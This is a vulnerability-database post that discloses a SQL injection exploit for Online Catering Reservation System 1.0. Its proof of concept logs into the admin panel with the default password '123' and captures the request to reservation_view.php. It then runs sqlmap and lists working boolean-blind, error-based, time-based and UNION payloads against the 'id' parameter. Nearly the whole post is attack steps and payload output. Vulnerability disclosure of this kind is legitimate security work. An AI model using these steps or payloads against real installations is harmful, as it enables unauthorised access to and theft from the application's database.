Saturday, February 27, 2021

Online Catering Reservation System 1.0 SQL Injection

exploit remote sql injection vulnerabilities In: , , , 
# Exploit Title: Online Catering Reservation System - SQL Injection 
(Authenticated)
# Date: 2021-02-25
# Exploit Author: [email protected]
# Vendor Homepage: 
https://www.sourcecodester.com/php/11355/online-catering-reservation.html
# Software Link: 
https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip
# Version: v1.0
# Tested on: Ubuntu 20.04.2

Parameter id in reservation_view.php is vulnerable to SQL Injection.

POC
---
1) Visit http://VICTIM/admin/
2) Put the default pass: 123
3) Go to Reservation->Confirmed Reservation -> View reservation or visit 
http://VICTIM/admin/reservation_view.php?id=1.
4) Save the request using Burp Suite as yourfile.txt
5) sqlmap -r yourfile.txt

REQUEST
-------
GET /admin/reservation_view.php?id=1 HTTP/1.1
Host: 192.168.1.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 
Firefox/78.0
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: sid=8spj19f306lim9ve5hg9iq56sf; lang=CZ; 
PHPSESSID=mdmn8a55hibuh8pav5serqhum1
Upgrade-Insecure-Requests: 1


SQLMAP OUTPUT
-------------
Parameter: id (GET)
     Type: boolean-based blind
     Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL 
comment)
     Payload: id=1' OR NOT 3039=3039#

     Type: error-based
     Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or 
GROUP BY clause (FLOOR)
     Payload: id=1' OR (SELECT 9283 FROM(SELECT 
COUNT(*),CONCAT(0x716b6b7171,(SELECT 
(ELT(9283=9283,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xbWN

     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 OR time-based blind
     Payload: id=1' OR SLEEP(5)-- hENp

     Type: UNION query
     Title: MySQL UNION query (NULL) - 24 columns
     Payload: id=1' UNION ALL SELECT 
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x535a755264454a726a6350517146596d615a77595a71666a63524372725a4a506a7973684a567251,0x717a6a7071)#
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore